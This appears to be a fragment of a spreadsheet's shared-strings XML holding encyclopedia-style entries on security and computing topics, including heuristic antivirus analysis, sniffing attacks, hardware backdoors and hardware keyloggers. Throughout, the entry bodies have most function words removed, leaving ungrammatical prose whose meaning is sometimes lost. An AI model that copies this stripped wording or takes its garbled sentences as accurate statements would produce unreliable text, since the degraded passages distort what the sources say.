  </si>
  <si>
    <t>heuristic analysis method employed many computer antivirus programs designed detect previously unknown computer viruses, well variants viruses already "wild".heuristic analysis expert based analysis determines susceptibility system towards particular threat/risk using various decision rules weighing methods. multicriteria analysis (mca) means weighing. this method differs statistical analysis, bases available data/statistics. operation most antivirus programs utilize heuristic analysis perform function executing programming commands questionable program script within specialized virtual machine, thereby allowing anti-virus program internally simulate would happen suspicious file executed keeping suspicious code isolated real-world machine. analyzes commands performed, monitoring common viral activities replication, file overwrites, attempts hide existence suspicious file. virus-like actions detected, suspicious file flagged potential virus, user alerted. another common method heuristic analysis anti-virus program decompile suspicious program, analyze machine code contained within. source code suspicious file compared source code known viruses virus-like activities. certain percentage source code matches code known viruses virus-like activities, file flagged, user alerted. effectiveness heuristic analysis capable detecting many previously unknown viruses variants current viruses. however, heuristic analysis operates basis experience comparing suspicious file code functions known viruses). this means likely miss viruses contain previously unknown methods operation found known viruses. hence, effectiveness fairly regarding accuracy number false positives. viruses discovered human researchers, information added heuristic analysis engine, thereby providing engine means detect viruses. references external links retrospective/proactive antivirus test av-comparatives.org</t>
  </si>
  <si>
    <t>Hardware-based full disk encryption</t>
  </si>
  <si>
    <t>Hardware security</t>
  </si>
  <si>
    <t>hardware security discipline originated cryptographic engineering involves hardware design, access control, secure multi-party computation, secure storage, ensuring code authenticity, measures ensure supply chain built product secure among things.a hardware security module (hsm) physical computing device safeguards manages digital keys strong authentication provides cryptoprocessing. these modules traditionally come form plug-in card external device attaches directly computer network server. some providers discipline consider difference hardware security software security hardware security implemented using "non-turing-machine" logic (raw combinatorial logic simple state machines). approach, referred "hardsec", uses fpgas implement non-turing-machine security controls combining security hardware flexibility software.hardware backdoors backdoors hardware. conceptionally related, hardware trojan (ht) malicious modification electronic system, particularly context integrated circuit.a physical unclonable function (puf) physical entity embodied physical structure easy evaluate hard predict. further, individual device must easy make practically impossible duplicate, even given exact manufacturing process produced respect hardware analog one-way function. name "physical unclonable function" might little misleading pufs clonable, pufs noisy therefore achieve requirements function. today, pufs usually implemented integrated circuits typically used applications high security requirements. many attacks sensitive data resources reported organizations occur within organization itself. also computer compatibility proprietary software free open-source software comparison open-source operating systems unified extensible firmware interface secure boot criticism trusted computing computational trust fingerprint (computing) side-channel attack power analysis electromagnetic attack acoustic cryptanalysis timing attack supply chain security list computer hardware manufacturers consumer protection security switch vulnerability (computing) defense strategy (computing) turing completeness universal turing machine finite-state machine automata theory references external links hardsec: practical non-turing-machine security threat elimination "hardsec" concept outline</t>
  </si>
  <si>
    <t>Snoop (software)</t>
  </si>
  <si>
    <t>snoop software command line packet analyzer included solaris operating system created microsystems. source code available opensolaris project. also comparison packet analyzers network references external links tcp/ip data communications administration guide docs.sun.com: snoop(1m) opensolaris: snoop source code</t>
  </si>
  <si>
    <t>Hajime (malware)</t>
  </si>
  <si>
    <t>hajime (japanese "beginning") malware appears similar wifatch malware appears attempt secure devices. hajime also advanced mirai, according various researchers. malware hajime worm according sources placed research subject. appears discovered early october 2016.later april 2017, hajime generated large media coverage appeared competition mirai. this number reports compared noted appeared similar purpose linux.wifatch. also contain modules tools denial service attacks, instead contained methods extending reach.hand written assembly code specifically several platforms also discovered researchers well.hajime similar mirai method manages compromise systems. differences mirai uses peer-to-peer network communications.what also noted message malware left systems compromised. message left systems compromised hajime displayed terminals shown below. also bashlite another notable malware denial-of-service attack linux malware linux.darlloz another notable malware remaiten another ddos references</t>
  </si>
  <si>
    <t>Halite AI Programming Competition</t>
  </si>
  <si>
    <t>halite open-source computer programming contest developed hedge fund/tech firm sigma partnership team cornell tech. programmers game environment learn everything need know game. participants asked build bots whichever language choose compete two-dimensional virtual battle field. history benjamin spector michael truell created first halite competition 2016. halite halite asked participants conquer territory grid. launched november 2016 ended february 2017. halite attracted 1,500 players. halite halite similar halite space-war theme. october 2017 january 2018. second installment competition attracted 6,000 individual players countries. among participants professors, physicists nasa engineers, well high school university students. halite halite launched mid-october 2018. october 2018 january 2019, ocean themed playing field. players asked collect manage halite, energy resource. competition, halite included 4000 players organizations. halite halite hosted kaggle, launched mid-june 2020. also list computer science awards competitive programming references external links halite challenge</t>
  </si>
  <si>
    <t>Halium</t>
  </si>
  <si>
    <t>halium collaborative project unify hardware abstraction layer projects linux mobile devices pre-installed android. project aims standardize middleware software used various projects talk android daemons make hardware installed devices. distributed free open-source software software licenses. history project announced 2017 tried pool developers ubports, sailfish community developers, luneos project, plasma mobile contributors, among developers fragmentation seen respective projects achieve goals jointly. features project planning overall idea stack includes following: linux kernel android sensors camera rild libhybris android interfaces like audioflingerglue droidmedia build system scripts agps mozilla pulseaudio media codecs ofono also anbox compatibility layer allow mobile applications games developed android linux android rooting linux mobile devices postmarketos replacement linux-based android devices list custom android firmware lineageos replicant completely free software variant lineageos, kernel blobs non-free drivers removed (operating system) comparison mobile operating systems list open-source mobile phones references external links official website halium documentation halium official telegram group</t>
  </si>
  <si>
    <t>Halt and Catch Fire (computing)</t>
  </si>
  <si>
    <t>computer engineering, halt catch fire, known assembly mnemonic hcf, idiom referring computer machine code instruction causes computer's central processing unit (cpu) cease meaningful operation, typically requiring restart computer. originally referred fictitious instruction system/360 computers (introduced 1964), making joke numerous non-obvious instruction mnemonics. with advent mc6800 (introduced 1974), design flaw discovered programmers. incomplete opcode decoding, illegal opcodes, 0x9d 0xdd, cause program counter processor increment endlessly, locks processor reset. those codes unofficially named hcf. during design process mc6802, engineers originally planned remove instruction, kept as-is testing purposes. result, officially recognized real instruction. later, became humorous catch-all term instructions freeze processor, including intentional instructions testing purposes, unintentional illegal instructions. some considered hardware defects, system shared, malicious user execute launch denial-of-service attack. case real instructions, implication expression that, whereas cases executes unintended instruction code) computer still able recover, case instruction definition, system recover without restart. expression catch fire facetious exaggeration speed chip would switching circuits, causing overheat burn. origins (1938) (1941) computers built konrad zuse contained illegal sequences instructions damaged hardware executed accident.apocryphal stories connect term illegal opcode system/360. processor, upon encountering instruction, would start switching lines fast, potentially leading overheating.in computer's assembly language, mnemonics used directly equivalent machine code instructions. mnemonics frequently three letters long, add, compare numbers), (jump different location program). instruction originally fictitious assembly language instruction, said development system/360 computers, along many amusing three-letter acronyms like (execute programmer) (corrupt accounting information), similar joke mnemonics "sdi" "self destruct immediately" "crn" "convert roman numerals". list mnemonics, including hcf, shows "overextended mnemonics" april 1980 creative computing flip-side parody issue.the system/360 already included numerous non-obvious mnemonics like (zero packed), edmk (edit mark), (translate test), read backward channel command), programmers began creating similarly cryptic, fictitious, instructions humorous vein.in 1990 usenet discussion, claimed dated back 1977.in rick cook's science fiction/fantasy novel, wizardry compiled, programmers transported universe magic could programmed, refers command hmcf, "halt, melt catch fire". tis-100, 2015 puzzle video game made zachtronics, achievement called halt_and_catch_fire crashing machine hidden opcode. modern cpus designers sometimes incorporate undocumented machine code instructions testing purposes, system/360 diagnose instruction. motorola 6800 motorola 6800 microprocessor first undocumented assembly mnemonic became widely known. operation codes (opcodes—the portions machine language instructions specify operation performed) hexadecimal reported given unofficial mnemonic article written gerry wheeler december 1977 issue byte magazine undocumented opcodes. wheeler noted motorola reported valid operation codes m6800 processor, inferred possible combinations, must "invalid instructions". goes describe "big surprise", saying catch fire portion moniker, "well, almost": when instruction oscilloscope. from user's point view machine halts defies attempts restarted. those persons indicator lamps address processor begins read memory, sequentially, quickly. effect, address turns counter. however, processor takes notice reading... reads. process reviewed david agans, thus: days motorola 6800 microprocessor, instruction code caused processor endless loop, reading memory address order. (other engineers referred "halt catch fire" [hcf] instruction, remembered code calling "drop dead" instruction.) drop dead mode wonderful spotting hardware timing address logic problems scope; address clock lines nice, cycling square waves. that either opcode made processor enter mode, continuously performing memory read cycles successive addresses intervening instruction fetches. hence, address effectively became counter, allowing operation address lines quickly verified. once processor entered mode, responsive interrupts, normal operation could restored reset (hence "drop dead" "halt catch fire" monikers). these references thus unresponsive behavior state, form erratic behavior.other hcf-like instructions found later motorola 6800 executing undocumented opcodes (cycling twice slower 9d/dd) cd/ed (cycling human-readable frequency limited number high-address lines).the mnemonic believed first built-in self-test feature motorola microprocessor. intel intel 8086 subsequent processors series (halt) instruction, opcode stopped instruction execution placed processor halt state. enabled interrupt, debug exception, binit signal, init signal, reset signal resumed execution, meant processor could always restarted. some early intel chips problem instruction could restarted instruction used, disabled computer turned instruction. linux kernel added "no-hlt" option telling linux infinite loop instead using hlt, allowed users broken chips linux.the 80286 undocumented opcode causing hang executed. reset. implementations, opcode emulated bios halting sequence.many computers intel pentium line could locked executing invalid instruction (f00f c7c8), caused computer lock this became known pentium f00f bug. compiler would create instruction, malicious programmer could insert code render afflicted computer inoperable machine power-cycled. since discovery, workarounds developed prevent locking computer, eliminated subsequent intel processors.during black 2017, christopher domas showed found currently unknown "halt catch fire" instruction particular processor model using processor fuzzer called sandsifter. other cpus technology 6502 invalid instructions freeze cpu.on zilog z80, executing (disable interrupts) followed halt (wait interrupt) results staying frozen indefinitely, waiting interrupt cannot happen. similar sharp processor core game boy's lr35902 system chip contains partial allowing recover halt, like 65c02's analogous instruction, becomes frozen consecutive halts interrupts disabled. core contains less opcodes fully lock executed.the also supports non-maskable interrupt. /nmi signal original package. since non-maskable interrupt regain control even executing instruction sequence halt, pair represent true hcf. result condition either /nmi connected directly rail, making generation signal impossible, interrupt routine services /nmi ends return, placing back halt state. hitachi sc61860 mainly used sharp pocket computers 1980–1990 also undocumented instruction opcode also cyrix coma killer poke fire write-only memory (joke) notes references</t>
  </si>
  <si>
    <t>Sniffing attack</t>
  </si>
  <si>
    <t>sniffing attack context network security, corresponds theft interception data capturing network traffic using packet sniffer application aimed capturing network packets). when data transmitted across networks, data packets encrypted, data within network packet read using sniffer. using sniffer application, attacker analyze network gain information eventually cause network crash become corrupted, read communications happening across network. general sniffing attacks compared tapping phone wires know conversation, reason, also referred wiretapping applied computer networks. using sniffing tools, attackers sniff sensitive information network, including email traffic (smtp, pop, imap traffic), traffic (http), traffic (telnet authentication, passwords, smb, nfs) many more. packet sniffer usually sniffs network data without making modifications network's packets. packet sniffers watch, display, traffic, information accessed attacker. prevention prevent networks sniffing attacks, organizations individual users keep away applications using insecure protocols, like basic http authentication, file transfer protocol (ftp), telnet. instead, secure protocols https, secure file transfer protocol (sftp), secure shell (ssh) preferred. case necessity using insecure protocol application, data transmission encrypted. required, (virtual private networks) used provide secure access users. also cloud computing security cyber security standards data loss prevention software network security toolkit wireless security references</t>
  </si>
  <si>
    <t>Sniffer (protocol analyzer)</t>
  </si>
  <si>
    <t>sniffer computer network packet protocol analyzer developed first sold 1986 network general corporation mountain view, 1994 sniffer become market leader high-end protocol analyzers. according 10-k filings corporate annual reports, 1986 march 1997 $933m worth sniffers related products services sold tools network managers developers. sniffer antecedent several generations network protocol analyzers, current popular wireshark. sniffer history sniffer first product network general corporation, founded 1986 harry saal shustek develop market network protocol analyzers. inspiration internal test tool developed within nestar systems, personal computer networking company founded october 1978 saal shustek along hinds nick fortis. 1982 engineers john rowlands chris reed nestar’s subsidiary zynar developed arcnet promiscuous packet receiver analyzer called tart (“transmit receive totaliser”) internal engineering test tool. used custom hardware, software written combination basic 8086 assembly code. when nestar acquired digital switch corporation (now communications) plano, texas 1986, saal shustek received rights tart. network general, saal shustek initially sold tart “r-4903 arcnet line analyzer (‘the sniffer’)”. they reengineered tart ibm’s token ring network hardware, created different user interface software written began selling sniffer™ december 1986. company four employees year. april 1987 company released ethernet version sniffer, october, versions arcnet, starlan, network broadband. protocol interpreters written network protocols various levels protocol stack, customers given ability write interpreters. product line gradually expanded include distributed sniffer system multiple remote network segments, expert sniffer advanced problem diagnosis, watchdog simple network monitoring. corporate history between inception 1988, network general sold $13.7m worth sniffers associated services. financing initially provided founders investment associates december 1987. february 1989 company, employees time, raised $22m public stock offering 1,900,000 shares nasdaq netg. august 1989, sold additional 1,270,000 shares secondary offering, april 1992 additional 2,715,000 shares third offering. december 1989, network general bought legend software, one-person company jersey founded hansen. their product network monitor called patrol, enhanced, rebranded, sold network general watchdog.by 1995 network general sold sniffer-related products totaling $631m average gross margin 77%. almost 1000 employees selling 1000 sniffers month. december 1997 network general merged mcafee associates (mcaf) form network associates, stock swap deal valued $1.3b. weeks later, network associates bought pretty good privacy, inc. (“pgp”) encryption company founded 1991 phil zimmerman, $35m cash. saal shustek left company shortly thereafter. 2002, much product line sold newly formed corporation undisclosed amount. subsequently acquired symantec 2010. mid-2004, network associates sold sniffer technology business investors silver lake partners texas pacific group $275m cash, creating network general corporation. that year, network associates readopted founder’s name became mcafee inc. september 2007, network general acquired netscout systems $205m. netscout marketed "sniffer portable" 2013, 2018 divested handheld network test tool business, including sniffer, stonecalibre. intellectual property rights network general, prior merger mcafee, filed patents sniffer. source code hardware designs protected trade secrets. most eventually acquired netscout 2007 acquisition. network general corporation applied trademark “sniffer” used context “analyzing testing digital traffic operations local area networks” 1989. accepted registered 1991. network general protected with, example, full-page wall street journal october 1995. 2021 trademark registration still active, owned netscout systems inc. network general also owned trademarks “expert sniffer”, “telesniffer”, “distributed sniffer system”, expired. original nestar arcnet sniffer arcnet sniffer developed internal test tool zynar used arcnet network interface card developed nestar plan networking systems. that board used com9026 integrated arcnet controller standard microsystems corporation, developed collaboration datapoint. there promiscuous mode chip would allow packets received regardless destination address. create sniffer, daughterboard developed intercepted receive data line chip manipulated data every packet looked like broadcast received chip. since ability receive packets viewed violation network privacy, circuitry implementing kept secret, daughterboard potted black epoxy discourage reverse-engineering. source code original tart/sniffer basic assembler program available github. 1986 network general sniffer sniffer promiscuous mode packet receiver, means received copy network packets without regard computer addressed packets filtered, analyzed using sometimes called deep packet inspection, stored later examination. sniffer implemented microsoft’s ms-dos operating system, used line 80-character text-only display. first version, pa-400 protocol analyzer token-ring networks, released compaq portable “luggable” computer intel 80286 processor, ram, internal hard disk, floppy disk drive, monochrome screen. retail price sniffer unit quantities $19,995 major modes operation were: “capture”, packets captured, stored, counted, summarized filters control packets captured triggers control capture stop, perhaps sought-after network error condition occurred “display”, packets analyzed interpreted filters control packets displayed options control aspects packets displayednavigation extensive menu system character-mode display variation miller columns originally created mark miller datapoint corporation file browser. sniffer manual described, “the screen shows three panels, arranged left right. immediately left current (highlighted) position node came from. above center panel alternative nodes also reachable node left… right nodes reachable node on.” pressing initiated capture real-time display activity. when capture ended, packets analyzed displayed now-standard three synchronized vertical windows: multiple packet summary, single packet decoded detail, numerical packet data. highlighting linked selected items window. multiple-packet summary, default display information highest level protocol stack present packet. other displays could requested using “display options” menu. translation data particular level network protocol stack user-friendly text “protocol interpreter”, network general provided pi’s commonly-used protocols day: decoding higher protocol levels often required interpreter maintain state information connections subsequent packets could property interpreted. that implemented combination locally cached data within protocol interpreter, ability look back earlier packets stored capture buffer. sniffer customers could write protocol interpreters decode rare protocols supported network general. interpreters written linked rest sniffer modules create executable program. procedure creating documented april 1987 part sniffer version 1.20.in addition supporting many network protocols, versions sniffer collected data major local area networks 1980s early 1990s: token-ring token ethernet (thick, thin, twisted pair) datapoint arcnet starlan appletalk corvus omninet fddi isdn frame relay synchronous data link control (sdlc) asynchronous transfer mode (atm) x.25 network (sytek) competitors even early years, sniffer competition, least aspects product. several were, like sniffer, ready-to-use packaged instruments: excelan's 1984 nutcracker, 1986 lanalyzer communications machinery corporation's drn-1700 lanscan ethernet monitor hewlett-packard's hp-4972a protocol analyzer digital equipment corporation's traffic monitor tektronix's tma802 media analyzerthere also several software-only packet monitors decoders, often running unix, often command-line user interface: tcpdump, using berkeley packet filter capture mechanisms provided operating system lanwatch, originally software also comparison packet analyzers wireshark tcpdump references external links "the ancient history computers network sniffers" (sharkfest 2021 keynote talk) sf16 shustek keynote, retrieved 2021-08-17 haugdahl, (october 1988). "benchmarking protocol analyzers". proceedings [1988] 13th conference local computer networks: 375–384. doi:10.1109/lcn.1988.10251. isbn 0-8186-0891-9. s2cid 336848. chartoff, marvin (1987-12-14). "lan management: what's right tool job?". network world. vol. international data group.</t>
  </si>
  <si>
    <t>Hang (computing)</t>
  </si>
  <si>
    <t>computing, hang freeze occurs either process system ceases respond inputs. typical example computer's graphical user interface (such microsoft windows) longer responds user typing keyboard moving mouse. term covers wide range behaviors clients servers, limited graphical user interface issues. hangs varied causes symptoms, including software hardware defects, infinite loop long-running uninterruptible computation, resource exhaustion (thrashing), under-performing hardware (throttling), external events slow computer network, misconfiguration, compatibility problems. fundamental reason typically resource exhaustion: resources necessary part system available, processes simply insufficient. often cause interaction multiple factors, making "hang" loose umbrella term rather technical one. hang temporary caused condition resolves itself, slow hardware, permanent require manual intervention, case hardware software logic error. many modern operating systems provide user means forcibly terminate hung program without rebooting logging out; operating systems, designed mobile devices, even automatically. severe hangs affecting whole system, solution might reboot machine, usually power cycling off/on reset button. hang differs crash, failure immediate unrelated responsiveness inputs. multitasking multitasking operating system, possible individual process thread stuck, blocking resource getting infinite loop, though effect overall system varies significantly. cooperative multitasking system, thread gets stuck without yielding hang system, wedge running thread prevent threads running. contrast, modern operating systems primarily pre-emptive multitasking, windows 2000 successors, well linux apple inc.'s macos. cases, single thread getting stuck necessarily hang system, operating system preempt time slice expires, allowing another thread run. thread hang, scheduler switch another group interdependent tasks processes hang. however, stuck thread still consume resources: least entry scheduling, running (for instance, stuck infinite loop), consume processor cycles power scheduled, slowing system though hang however, even preemptive multitasking, system hang, misbehaved malicious task hang system, primarily monopolizing resource, memory, even though processor time can't monopolized. example, process blocks file system often hang system. moving around window hanging program hang cause window trail redrawing. causes hardware cause computer hang, either intermittent mismatched hardware computer (this occur makes upgrade). hardware also become defective time dirt heat damage. hang also occur fact programmer incorrect termination conditions loop, co-operative multitasking operating system, forgetting yield tasks. said differently, many software-related hangs caused threads waiting event occur never occur. this also known infinite loop. another cause hangs race condition communication processes. process send signal second process stop execution receives response. second process busy signal forced wait process however, second process busy sending signal first process processes would wait forever respond signals never other’s signal (this event known deadlock). processes uninterruptible hang shut down. least processes critical kernel process whole system hang restarted. computer seem hang fact simply processing slowly. this caused many programs running once, enough memory (ram), memory fragmentation, slow hardware access (especially remote devices), slow system apis, etc. also caused hidden programs installed surreptitiously, spyware. solutions many cases programs appear hung, making slow progress, waiting minutes allow task complete. modern operating systems provide mechanism terminating hung processes, instance, unix kill command, graphical means task manager's "end task" button windows (select particular process list press "end task"). older systems, running ms-dos, early versions windows, classic often needed completely restarted event hang. embedded devices human interaction limited, watchdog timer reboot computer event hang. notes also abort (computing) anomaly software blue screen death crash (computing) deadlock livelock infinite loop uninterruptible sleep references</t>
  </si>
  <si>
    <t>Snefru</t>
  </si>
  <si>
    <t>snefru cryptographic hash function invented ralph merkle 1990 working xerox parc. function supports 128-bit 256-bit output. named egyptian pharaoh sneferu, continuing tradition khufu khafre block ciphers. original design snefru shown insecure biham shamir able differential cryptanalysis find hash collisions. design modified increasing number iterations main pass algorithm eight. although differential cryptanalysis break revised version less complexity brute force search certificational weakness), attack requires 88.5 {\displaystyle 2^{88.5}} operations thus currently feasible practice. references external links snefru-n ecrypt rhash sourceforge, open source command-line tool, calculate verify snefru-128 snefru-256</t>
  </si>
  <si>
    <t>Hanwha Techwin</t>
  </si>
  <si>
    <t>hanwha techwin (korean: 한화테크윈 주식회사; hanja: 韓華---株式會社; hanhwa tekeuwin jusighoesa), founded samsung techwin, video surveillance company. subsidiary hanwha group. company employs 1,822 people headquartered south korea. total sales 2020 529.8 billion south korean won. before acquisition hanwha, techwin also developed sold automation, aeronautics, weapons technology products. these businesses since spun dedicated hanwha subsidiaries hanwha precision machinery, hanwha aerospace, hanwha land systems. history company founded samsung precision 1977, later renamed samsung techwin. under samsung, company established precision instrument laboratory 1978, started making cameras 1979. technical cooperation general electric, started manufacturing engines korean aircraft 1980. manufacture (6.1 self-propelled artillery began 1984. changed name samsung aerospace industries 1987 started make helicopters. acquired rollei, german camera manufacturer, union optics japan, manufacturer semiconductor equipment. 1996 developed sb427 helicopter bell began selling digital cameras branded "samsung kenox" 1997. year, made first kf-16 fighter korea. handed firm's aircraft business korea aerospace industries 1999 changed name samsung techwin 2000. exported 155mm self-propelled artillery turkey. 2005, company marked first place korean digital cameras market share started technical co-operation pentax.samsung techwin directly entered european north american closed-circuit television/surveillance market 2008 name, featuring line true day/night cameras digital video recorders (dvrs). 2009, company introduced series digital ip-based cameras network video recorders. samsung techwin bigger sister company samsung electronics announced october 2009 2010 samsung electronics cctv camera division would unified samsung techwin's cctv camera division. recent years companies appeared cctv market lineups shared technological underpinnings many ways differed (including incompatible control protocols), many markets direct competitors overlapping distribution channels. although earlier speculation existed specialty literature company would appear name samsung security, official announcement stated cctv division samsung electronics transferred samsung techwin.in february 2014, samsung techwin presented portfolio cameras vertical markets international security, safety fire exhibition (sicur).in december 2014, samsung electronics announced sale holding stake security division, samsung techwin, south korean conglomerate hanwha group.on june 2015, hanwha completed takeover renamed hanwha techwin.in 2017, hanwha techwin spun pick-and-place machine business hanwha precision machinery.in 2018, hanwha techwin took part korea international boat show 2018, asia’s boat shows. hanwha techwin global security corporation participate marine leisure industry exhibition held goyang, south korea kintex. hanwha techwin exhibited importance safety demonstrated maritime security solutions.in november 2020, system integrators announced. mobile devices downloaded google play apple store. makes verifying devices installed conveniently creates bill materials verify order fulfilled.on july 2021, hanwha techwin announces five models series cameras. hanwha series camera model security cameras video analytic technology. this technology capable detecting objects, people, vehicles, license plates, faces, well classifying objects categories groups, gender, colour. products surveillance: cctv (surveillance) systems, modules, presenter, frid, dvr, optical instruments, etc. former products defense industries transferred hanwha defense thunder self-propelled artillery, (ammunition resupply vehicles), sub-systems black panther, robot sgr-a1. transferred hanwha aerospace power systems: turbines, engines helicopters, refrigerant compressors, overhaul, etc. transportations: samsung techwin operates helicopter routes inside south korea. consumer electronics transferred samsung electronics digital still cameras: samsung digimax line (e.g. samsung digimax also hanwha samsung references external links hanwha techwin official site</t>
  </si>
  <si>
    <t>Snare (software)</t>
  </si>
  <si>
    <t>snare (sometimes also written snare, acronym system intrusion analysis reporting environment) collection software tools collect audit data variety operating systems applications facilitate centralised analysis. enterprise agents available linux, macos, windows, solaris, microsoft server, variety browsers, more. snare enterprise epilog windows facilitates central collection processing windows text-based files isa/iis. snare enterprise epilog unix provides method collect text based files linux solaris operating systems. opensource agents available irix aix. snare currently used hundreds thousands individuals organisations worldwide meet local federal information security guidelines associated auditing eventlog collection. history snare series agents began life 2001 team intersect alliance created linux kernel module implement trusted computer system evaluation criteria auditing level. agents windows, solaris soon followed, additional operating systems, applications added time. snare server software originally designed meet needs australian-based intelligence agency clients, distribution restricted australia only. need server solution complement increasingly popular snare agents, pushed intersect alliance team find overseas partners, allow distribution internationally. distribution snare described facto standard windows event retrieval', deep roots open source movement, coupled available commercial support options, used small non-profit organisations, right huge multinational, fortune-500 companies. organisations produce audit server software competes snare server software, cisco, sensage, loglogic recommend snare agents customers. most agents supported commercial, open-source version available. design snare agents designed collect audit data host system, push data quickly possible, central server servers), archive, analysis, reporting. central server either syslog server, snare server appliance, custom application. snare agents also able push logs unidirectional network order facilitate transfer networks classification networks higher classification. snare server appliance, software-only solution, provides variety analysis tools facilitate collection, analysis, reporting, archival audit data. snare product suite snare enterprise agent windows snare enterprise agent linux snare enterprise agent solaris snare enterprise agent macos snare enterprise agent mssql snare enterprise epilog windows snare enterprise epilog unix snare central snare repository snare reflector snare agent management tools references external links snare solutions snare central snare agents snare lite sourceforge</t>
  </si>
  <si>
    <t>Hardening (computing)</t>
  </si>
  <si>
    <t>computer security, hardening usually process securing system reducing surface vulnerability, larger system performs functions; principle single-function system secure multipurpose one. reducing available ways attack typically includes changing default passwords, removal unnecessary software, unnecessary usernames logins, disabling removal unnecessary services. there various methods hardening unix linux systems. this involve, among measures, applying patch kernel exec shield pax; closing open network ports; setting intrusion-detection systems, firewalls intrusion-prevention systems. there also hardening scripts tools like lynis, bastille linux, jass solaris systems apache/php hardener can, example, deactivate unneeded features configuration files perform various protective measures. binary hardening binary hardening security technique binary files analyzed modified protect common exploits. binary hardening independent compilers involves entire toolchain. example, binary hardening technique detect potential buffer overflows substitute existing code safer code. advantage manipulating binaries vulnerabilities legacy code fixed automatically without need source code, unavailable obfuscated. secondly, techniques applied binaries multiple compilers, less secure others. binary hardening often involves non-deterministic modification control flow instruction addresses prevent attackers successfully reusing program code perform exploits. common hardening techniques are: buffer overflow protection stack overwriting protection position independent executables address space layout randomization binary stirring (randomizing address basic blocks) pointer masking (protection code injection) control flow randomization protect control flow diversion) also computer security computer network security network security policy security-focused operating system security-enhanced linux references external links "hardening your computing assets" (pdf). globalsecurity.org</t>
  </si>
  <si>
    <t>Hardware backdoor</t>
  </si>
  <si>
    <t>hardware backdoors backdoors hardware, code inside hardware firmware computer chips. backdoors directly implemented hardware trojans integrated circuit. hardware backdoors intended undermine security smartcards cryptoprocessors unless investment made anti-backdoor design methods. they also considered hacking. severity hardware backdoors considered highly problematic because: they can’t removed conventional means antivirus software they circumvent types security disk encryption they injected manufacturing time user degree control examples around 2008 reported 3,500 counterfeit cisco network components discovered found military government facilities. 2011 jonathan brossard demonstrated proof-of-concept hardware backdoor called "rakshasa" installed anyone physical access hardware. uses coreboot re-flash bios seabios ipxe benign bootkit built legitimate, open-source tools fetch malware boot time. 2012, sergei skorobogatov (from university cambridge computer laboratory) woods controversially stated found backdoor military-grade fpga device could exploited access/modify sensitive information. said proven software problem deliberate attempt sabotage still brought light need equipment manufacturers ensure microchips operate intended. 2012 mobile phones developed chinese device manufacturer found carry backdoor instantly gain root access password hard-coded software. this confirmed security researcher dmitri alperovitch. u.s. sources pointed finger suspicion huawei hardware since least 2012, suggesting possibility presence backdoors huawei products. 2013 researchers university massachusetts devised method breaking cpu's internal cryptographic mechanisms introducing specific impurities crystalline structure transistors change intel's random-number generator. documents revealed 2013 onwards surveillance disclosures initiated edward snowden showed tailored access operations (tao) unit employees intercepted servers, routers, network gear shipped organizations targeted surveillance install covert implant firmware onto delivery. these tools include custom bios exploits survive reinstallation operating systems cables hardware radio transceiver packed inside. june 2016 reported university michigan department electrical engineering computer science built hardware backdoor leveraged "analog circuits create hardware attack" capacitors store enough electricity fully charged, would switched give attacker complete access whatever system device contains backdoored chip. study "best paper" award ieee symposium privacy security also note microscopic hardware backdoor caught practically modern method hardware security analysis, could planted single employee chip factory. september 2016 skorobogatov showed removed nand chip iphone main memory storage system used many apple devices cloned incorrect combinations allowed attempt-counter. october 2018 bloomberg reported attack chinese spies reached almost u.s. companies, including amazon apple, compromising america's technology supply chain. countermeasures skorobogatov developed technique capable detecting malicious insertions chips.new york university tandon school engineering researchers developed corroborate chip's operation using verifiable computing whereby "manufactured sale" chips contain embedded verification module proves chip's calculations correct associated external module validates embedded verification module. another technique developed researchers university college london (ucl) relies distributing trust multiple identical chips disjoint supply chains. assuming least chips remains honest security device preserved.researchers university southern california ming hsieh department electrical computer engineering photonic science division paul scherrer institute developed technique called ptychographic x-ray laminography. this technique current method allows verification chips blueprint design without destroying cutting chip. also significantly less time current methods. anthony levi professor electrical computer engineering university southern california explains “it’s approach non-destructive reverse engineering electronic chips—[and] reverse engineering assurance chips manufactured according design. identify foundry, aspects design, design. it’s like fingerprint.” this method currently able scan chips zoom sections accommodate chips millimeters millimeters easily accommodating apple chip able scan full nvidia volta gpu. "future versions laminography technique could reach resolution nanometers reduce time low-resolution inspection 300-by-300-micrometer segment less hour, researchers say." also clipper chip fbi–apple encryption dispute hardware security hardware security hardware trojan intel active management technology security zombie zero open hardware code signing intel management engine platform security processor references further reading krieg, christian; dabrowski, adrian; hobel, heidelinde; krombholz, katharina; weippl, edgar (2013). hardware malware. [s.l.]: morgan claypool. isbn 9781627052528.</t>
  </si>
  <si>
    <t>Hardware functionality scan</t>
  </si>
  <si>
    <t>hardware functionality scan (hfs) conducted order verify certain device really claims patented microsoft.some operating systems send copy protected content, movies, output device, screen, device able protect content tapped unprotected format. this mechanism circumvented letting fake hardware claiming trusted device. prevents letting device perform certain tasks hard emulate. problems order support open-source drivers, hardware manufacturer reveal details product, requires information kept secret. problem generic drivers requires individual drivers variant product make distinguishable, drivers account implementation details instead using abstract functionality models.a hardware manufacturer product's fingerprint listed database trusted hardware order make work newer windows operating systems. thus, microsoft dictates conditions device accepted. manufacturer required implement certain drm-features, royalty respective inventor. references</t>
  </si>
  <si>
    <t>Hardware keylogger</t>
  </si>
  <si>
    <t>hardware keyloggers used keystroke logging, method capturing recording computer users' keystrokes, including sensitive passwords. they implemented bios-level firmware, alternatively, device plugged inline computer keyboard computer. they keyboard activity internal memory. description hardware keyloggers advantage software keyloggers begin logging moment computer turned (and therefore able intercept passwords bios disk encryption software). hardware keylogger devices following: microcontroller interprets datastream keyboard computer, processes passes non-volatile memory non-volatile memory device, flash memory stores recorded data, retaining even power lostgenerally, recorded data retrieved typing special password computer text editor. hardware keylogger plugged keyboard computer detects password typed presents computer "typed" data produce menu. beyond text menu keyloggers offer high-speed download speed retrieval stored data; mass-storage enumeration serial download adapter. typically memory capacity hardware keylogger range kilobytes several gigabytes, keystroke recorded typically consuming byte memory. types hardware keyloggers regular hardware keylogger used keystroke logging means hardware circuit attached somewhere computer keyboard computer. logs keyboard activity internal memory accessed typing series pre-defined characters. hardware keylogger advantage software solution; dependent computer's operating system interfere program running target machine hence cannot detected software. they typically designed innocuous appearance blends rest cabling hardware, appearing balun. they also installed inside keyboard circuit attachment modification), keyboard could manufactured "feature". they designed work legacy ps/2 keyboards, recently, keyboards. some variants, known wireless hardware keyloggers, ability controlled monitored remotely means wireless communication standard. wireless keylogger sniffers collect packets data transferred wireless keyboard receiver attempt crack encryption used secure wireless communications devices. firmware computer's bios, typically responsible handling keyboard events, reprogrammed records keystrokes processes them. keyboard overlays fake keypad placed real keys pressed registered eavesdropping device well legitimate customer using. commands exist much legitimate software. these programs require keyloggers know you’re using specific command. countermeasures denial monitoring physical access sensitive 